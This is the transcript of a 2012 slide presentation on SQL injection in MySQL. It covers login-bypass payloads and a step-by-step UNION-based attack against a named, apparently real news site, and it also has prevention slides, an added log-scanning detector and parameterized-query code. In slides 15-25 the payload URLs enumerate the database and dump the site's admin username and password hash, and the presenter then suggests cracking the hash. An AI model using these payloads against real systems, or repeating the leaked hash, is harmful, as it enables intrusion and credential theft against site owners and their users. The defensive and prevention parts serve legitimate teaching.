
SQL-injection in action

Presentation Transcript


  1. SQL-injection in action
  In MySQL RDBMS
  By Siamak Aghaeipour, Dec 2012

  2. Before Action
  Boring part . . .

  3. Computer Security
  • Computer Security is the degree of protection in computer-based equipment.
  • Nothing Is 100% Secure
  There’s an old joke in computer security circles that the only truly secure computer is one that’s disconnected from all power and communication lines, and locked in a safe at the bottom of a reinforced bunker surrounded by armed guards!
  So … if a hacker wants to get into your system, you cannot stop him completely, but you can make it difficult for him.
  Remember … Security is a BIG field that is much more than programming.

  4. Hacker
  A real hacker is a genius programmer: somebody who finds weaknesses in a computer or computer network.
  Types of Hackers
  • White Hat - Tests the security of a system.
  • Black Hat - Destroys data or makes the network unusable.
  • Grey Hat - Combination of a black hat and a white hat (finds and tries to fix).
  • Neophyte - Learning before action.
  • Script Kiddie - Uses tools with no understanding.
  • Hacktivist - Political ideals and issues.
  • Elite Hacker - The most skilled hackers.

  5. SQL-Injection
  • What? SQL injection is a technique often used to attack a website. It was one of the top 10 web application vulnerabilities of 2007 and 2010.
  • How? By injecting SQL statements into a SQL query.
  • So What? To run an SQL command that can change database content or access database information.
  • What’s The Point? The point is: DO NOT FORGET “Every user is a hacker”.

  6. The Key to Preventing SQL-Injection
  Never, ever trust any kind of user input.
  • Especially input that comes from the client side, even when it comes from a select box, a hidden input field or a cookie.
  • Check that the given input has the expected data type.
  NO, IT’S NOT AN OPTION. You MUST validate every piece of data that comes from the user!

  7. Imperva’s Web Application Attack Report, Edition #1 (July 2011)
  Imperva is a data security company which provides solutions for high-value business data protection.
  [Chart from the report. Legend: RFI = Remote File Inclusion, SQLI = SQL-Injection, XSS = Cross-Site Scripting]

  8. In Action
  Attractive part . . .

  9. SQL-Injection – Login Forms
  SELECT
  Syntax:
  • SELECT [column_name(s)] FROM [table_name] WHERE [Condition(s)]
  Example:
    SELECT FirstName,LastName FROM students WHERE FirstName='Siamak'
    SELECT 1,2 FROM students WHERE FirstName='Siamak'
    SELECT * FROM students WHERE FirstName='Siamak'

  10. SQL-Injection – Login Forms
  A simple query for validating admin:
  • SELECT user,pass FROM admin WHERE user='siamak' and pass='1234'
  In a real program siamak and 1234 are variables. So …
  • SELECT user,pass FROM admin WHERE user='$usr' and pass='$psw'
  What will happen if:
    $usr = siamak' #
    $psw = (empty)

  11. SQL-Injection – Login Forms
  A simple query for validating admin:
  What does # do? In MySQL, # comments out the rest of the query. So …
  • SELECT user,pass FROM admin WHERE user='siamak' # and pass='$psw'
  And it means:
  • SELECT user,pass FROM admin WHERE user='siamak'
  So you can log in with only the admin username, without having the password!

  12. SQL-Injection – Login Forms
  A simple query for validating admin:
  Or you can use
    $usr = ' OR '1' = '1
    $psw = ' OR '1' = '1
  • SELECT user,pass FROM admin WHERE user='' OR '1'='1' and pass='' OR '1'='1'
  So you can log in with NOTHING!!!

  13. information_schema
  The most sensitive database in MySQL is information_schema:
  • This database holds the names of all databases, tables, columns, …
  In a SQL-injection attack these tables of information_schema are more useful than the others:
  • SCHEMATA
  • TABLES
  • COLUMNS

  14. SQL-Injection – Address bar
  On a victim site, when you click on a link you are redirected to a page something like this:
  • http://www.example.com/news.php?id=34
  So what is ?id=34 ?
  GET method:
  Syntax: ?[var1]=[value1]&[var2]=[value2]&[var3]=[value3]
  Example:
    ?category=sport&newsID=34
    ?name=siamak&orderID=254

  15. SQL-Injection – Address bar
  When you append ' or " you can find out whether the query is injectable or not!
  • http://www.mediamasterminds.com/news/post.php?id=34'
  If the programmer does not filter the value of id, a warning will occur:
  • Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/content/j/s/w/jswilliams1/html/news/post.php on line 12
  Now you know that this site is vulnerable. Now it is time to inject your query to find out more about the database, tables, … structures.

  16. SQL-Injection – Address bar
  ORDER BY
  Syntax:
  • SELECT [column_name(s)] FROM [table_name] ORDER BY [column_name || column_number]
  Example:
    SELECT FirstName,LastName FROM students ORDER BY FirstName
    SELECT FirstName,LastName FROM students ORDER BY 1
    SELECT FirstName,LastName FROM students ORDER BY 2

  17. SQL-Injection – Address bar
  • Let's check how many columns are selected in the query.
  • Use -- to comment out the rest of the query (in MySQL, -- starts a comment only when it is followed by whitespace).
  • We guess the number of columns, so we try to ORDER BY that number.
  • First guess is 100.
  • Keep doing this until the error disappears.
    http://www.mediamasterminds.com/news/post.php?id=42+order+by+100-- : error
    http://www.mediamasterminds.com/news/post.php?id=42+order+by+50-- : error
    http://www.mediamasterminds.com/news/post.php?id=42+order+by+20-- : OK
    http://www.mediamasterminds.com/news/post.php?id=42+order+by+25-- : OK
    http://www.mediamasterminds.com/news/post.php?id=42+order+by+26-- : error
  Now we have the column count: 25. So this table has 25 columns.

  18. SQL-Injection – Address bar
  UNION
  Syntax:
  • SELECT [column_name(s)] FROM [table1_name] UNION SELECT [column_name(s)] FROM [table2_name]
  Example:
  • SELECT sID,sName FROM students UNION SELECT tID,tName FROM teachers
  • The number of selected columns must be equal in both SELECTs.
  • You can select from another database too.

  19. SQL-Injection – Address bar
  • Use a negative id (-42) to make sure the first SELECT won't return any records.
  • Then use UNION to select from another database [information_schema].
  • http://www.mediamasterminds.com/news/post.php?id=-42
  • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,SCHEMA_NAME,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.SCHEMATA--
  • Use LIMIT offset,count to limit the records. EX: LIMIT 2,10
  • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,SCHEMA_NAME,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.SCHEMATA+limit+0,1--
  • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,SCHEMA_NAME,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.SCHEMATA+limit+1,1--
  Now we have the database name: "mediamaster".

  20. SQL-Injection – Address bar
  GROUP_CONCAT()
  Syntax:
  • SELECT GROUP_CONCAT([column_name(s)]) FROM [table_name]
  Example:
    SELECT GROUP_CONCAT(firstName) FROM students
  • This function returns a single string result. EX result if there are three records: “siamak,mazdak,laklak”

  21. SQL-Injection – Address bar
  • Now we should find the table names.
  • This time we select from TABLES in information_schema.
  • We use GROUP_CONCAT() to turn the result into a single string.
  • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,GROUP_CONCAT(TABLE_NAME),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.TABLES--
  Now we have the tables: wp_comments, wp_links, wp_options, wp_postmeta, wp_posts, wp_term_relationships, wp_term_taxonomy, wp_terms, wp_usermeta, wp_users

  22. SQL-Injection – Address bar
  So we have …
  • database name: mediamaster
  • table names: wp_comments, wp_links, wp_options, wp_postmeta, wp_posts, wp_term_relationships, wp_term_taxonomy, wp_terms, wp_usermeta, wp_users

  23. SQL-Injection – Address bar
  • Now we should find the column names.
  • The table that holds users is wp_users, so we try to find the columns of this table.
  • This time we select from COLUMNS in information_schema.
  • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,COLUMN_NAME,TABLE_SCHEMA,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.COLUMNS+limit+200,1--
  • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,COLUMN_NAME,TABLE_SCHEMA,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.COLUMNS+limit+300,1--
  • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,COLUMN_NAME,TABLE_SCHEMA,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.COLUMNS+limit+262,1--
  • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,COLUMN_NAME,TABLE_SCHEMA,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.COLUMNS+limit+341,1--
  This table’s columns run from record number 262 to 341.

  24. SQL-Injection – Address bar
  • The columns of wp_users are: id, user_login [341,1], user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name [350,1]
  • Now we know the exact structure of the database.
  • Then write the main query:
  • http://www.mediamasterminds.com/news/post.php?id=-42+union+select+1,2,3,4,user_login,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+wp_users+limit+0,1--

  25. SQL-Injection – Address bar
  Finally Done.
  Username: admin
  Hashed Password: $P$BeV0IWgNwdMuiQ6gCU1o9BjQtI3VsW1
  Crack the hash with a password cracker site.
  THAT’S IT!
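  A defender-side counterpart to the probing sequence of slides 15 to 25, added here as an example that is not part of the original presentation: it scans constructed web-server access-log lines (assumed to be in Apache combined format) for the quote probe, ORDER BY column counting, UNION SELECT and information_schema patterns shown above, and reports any source address that repeats them.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original page); the first request is
# normal, the rest mirror the probing steps of slides 15, 17, 19 and 21.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Dec/2012:10:00:01 +0000] "GET /news/post.php?id=34 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Dec/2012:10:00:07 +0000] "GET /news/post.php?id=34' HTTP/1.1" 200 812
10.0.0.9 - - [01/Dec/2012:10:00:12 +0000] "GET /news/post.php?id=42+order+by+100-- HTTP/1.1" 200 812
10.0.0.9 - - [01/Dec/2012:10:00:31 +0000] "GET /news/post.php?id=-42+union+select+1,2,SCHEMA_NAME,4+from+information_schema.SCHEMATA-- HTTP/1.1" 200 4410
10.0.0.9 - - [01/Dec/2012:10:00:40 +0000] "GET /news/post.php?id=-42+union+select+1,GROUP_CONCAT(TABLE_NAME),3,4+from+information_schema.TABLES-- HTTP/1.1" 200 4523
"""

# Source IP and request target of a combined-format access-log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

# Signatures are matched against the URL-decoded target, case-insensitively.
SIGNATURES = [
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("quote_after_numeric_id", re.compile(r"""[?&]id=\d+['"]""", re.I)),
]

def classify(line):
    """Return (ip, [matching signature names]) or None for an unparsable line."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    target = unquote_plus(m.group(2))   # '+' and %xx decoded before matching
    return m.group(1), [name for name, rx in SIGNATURES if rx.search(target)]

def scan(log):
    """All (ip, tags) pairs for lines that hit at least one signature."""
    hits = [classify(line) for line in log.splitlines()]
    return [h for h in hits if h and h[1]]

def suspicious_ips(log, threshold=2):
    """Sources with at least `threshold` tagged requests: a single quoted id may be
    a typo, but repeated ORDER BY / UNION probing from one address is not."""
    counts = {}
    for ip, _ in scan(log):
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)
```

  Feeding a real log through scan() gives the per-request tags; suspicious_ips() is the line you would alert on.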

  26. After Action
  Important part . . .

  27. SQL-Injection – Prevent
  To prevent SQL-injection, you can escape strings before putting them in the query, or better, keep user input out of the query text altogether with parameterized queries.
  • EX in PHP: (You can also use PDO; the mysql_* extension used here was removed in PHP 7, and PDO prepared statements are its replacement.)
    $id = intval($id);                          // force the expected type: an integer
    $user = mysql_real_escape_string($user);    // escape quotes before the string reaches the query
  • EX in C#.NET: (Parameterized Query)
    SqlParameter[] myparm = new SqlParameter[2];
    myparm[0] = new SqlParameter("@User", user);
    myparm[1] = new SqlParameter("@Pass", password);
    string comando = "SELECT * FROM table WHERE user=@User AND password=@Pass";
  • EX in JAVA: (PreparedStatements)
    String selectStatement = "SELECT * FROM User WHERE userId = ?";
    PreparedStatement prepStmt = con.prepareStatement(selectStatement);
    prepStmt.setString(1, userId);
    ResultSet rs = prepStmt.executeQuery();
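  The login query of slides 10 to 12 next to its parameterized form, and the data-type check of slide 6 applied to ?id=, as an added example that is not code from the original presentation. It assumes an in-memory sqlite3 table as a stand-in for the MySQL admin table (placeholders work the same way through a MySQL driver), and its validate_news_id() is stricter than PHP's intval(): it rejects bad input instead of coercing it.

```python
import sqlite3

# In-memory stand-in for the slides' MySQL "admin" table (constructed; sqlite3 is
# used only so the example runs without a MySQL server).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (user TEXT, pass TEXT)")
    con.execute("INSERT INTO admin VALUES ('siamak', '1234')")
    return con

def login_vulnerable(con, usr, psw):
    """The slides' query built by string interpolation: user input becomes SQL."""
    sql = "SELECT user,pass FROM admin WHERE user='%s' and pass='%s'" % (usr, psw)
    return con.execute(sql).fetchone() is not None

def login_parameterized(con, usr, psw):
    """Same query with placeholders: the driver sends the values separately,
    so they are compared as data and can never change the statement."""
    sql = "SELECT user,pass FROM admin WHERE user=? and pass=?"
    return con.execute(sql, (usr, psw)).fetchone() is not None

def validate_news_id(raw):
    """Slide 6's type check for ?id=34: only a plain non-negative integer is
    accepted, so "34'" or "-42 union select ..." is rejected before any query."""
    if not raw.isdigit():
        raise ValueError("id must be a non-negative integer")
    return int(raw)

def demo():
    con = make_db()
    payload = "' OR '1' = '1"   # the tautology payload from slide 12
    return {
        "valid_vuln": login_vulnerable(con, "siamak", "1234"),
        "valid_param": login_parameterized(con, "siamak", "1234"),
        "bypass_vuln": login_vulnerable(con, payload, payload),
        "bypass_param": login_parameterized(con, payload, payload),
    }
```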

  28. SQL-Injection
  That was just the beginning.
  [Figure: “Security” versus “This article”]

  29. SQL-Injection – References
  Books:
  1. Pro PHP Security, Second Edition (2010) - Chris Snyder, Thomas Myer and Michael Southwell
  2. Attack And Defence PHP Web Apps - Shahriyar Jalayeri
  Articles:
  1. SQL Injection - php.net: http://php.net/manual/en/security.database.sql-injection.php
  2. SQL-Injection, powered by WebSec.ca: http://www.websec.ca/kb/sql_injection
  3. SQL Injection cheat sheet - RSnake: http://ha.ckers.org/sqlinjection/
  4. Wikipedia: http://en.wikipedia.org/
  And some other articles …

  30. Thank You All. Any Questions?
  Siamak Aghaeipour
  http://blacksrc.com
